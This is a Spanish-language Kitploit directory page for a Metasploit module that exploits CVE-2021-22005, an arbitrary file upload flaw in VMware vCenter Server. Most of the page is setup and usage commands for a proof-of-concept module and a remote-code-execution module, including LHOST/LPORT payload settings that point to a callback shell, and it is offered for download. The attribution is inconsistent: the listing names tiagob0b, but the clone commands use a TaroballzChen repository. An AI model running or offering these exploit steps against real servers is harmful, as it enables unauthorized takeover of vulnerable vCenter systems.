Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-22005 — Módulo de Metasploit para la vulnerabilidad de carga de archivos arbitraria CVE-2021-22005 en VMware vCenter con prueba de concepto y exploit de ejecución remota de código. | Kitploit
Herramientas/GitHubGitHub/tiagob0b/cve-2021-22005
Frameworks de ExploitsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónDesarrollo de Payloads
GitHubtiagob0b/cve-2021-22005

CVE-2021-22005

Módulo de Metasploit para la vulnerabilidad de carga de archivos arbitraria CVE-2021-22005 en VMware vCenter con prueba de concepto y exploit de ejecución remota de código.

Ver Repositorio
232hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-22005-metasploit

el script de metasploit (POC/EXP) sobre CVE-2021-22005 VMware vCenter Server contiene una vulnerabilidad de subida de archivos arbitraria

preparación POC

root@kitploit:~
git clone https://github.com/TaroballzChen/CVE-2021-22005-metasploit
cd CVE-2021-22005-metasploit
mkdir -p ~/.msf4/modules/auxiliary/scanner/http
cp vmware_vcenter_server_file_upload_poc.py ~/.msf4/modules/auxiliary/scanner/http/
chmod +x ~/.msf4/modules/auxiliary/scanner/http/vmware_vcenter_server_file_upload_poc.py
msfconsole

uso de POC

root@kitploit:~
set rhost <vuln ip/host>
set port <vuln port>
set ssl <default: true for https>
exploit

resultado

el script subirá un jsp inofensivo que incluye el texto "Could be vuln by CVE-2021-22005" codificado en base64 poc

preparación EXP

root@kitploit:~
git clone https://github.com/TaroballzChen/CVE-2021-22005-metasploit
cd CVE-2021-22005-metasploit
mkdir -p ~/.msf4/modules/exploits/linux/http
cp vmware_vcenter_server_file_upload_to_rce.py ~/.msf4/modules/exploits/linux/http/
chmod +x ~/.msf4/modules/exploits/linux/http/vmware_vcenter_server_file_upload_to_rce.py
msfconsole

uso del exploit

root@kitploit:~
set target <target>
set PAYLOAD <payload>
set rhost <vuln ip>
set port <vuln port>
set LHOST <list host ip>
set LPORT <list port>
exploit

exploit

exploit

referencia

  • https://github.com/5gstudent/CVE-2021-22005-
  • https://github.com/rwincey/CVE-2021-22005
Descargar herramienta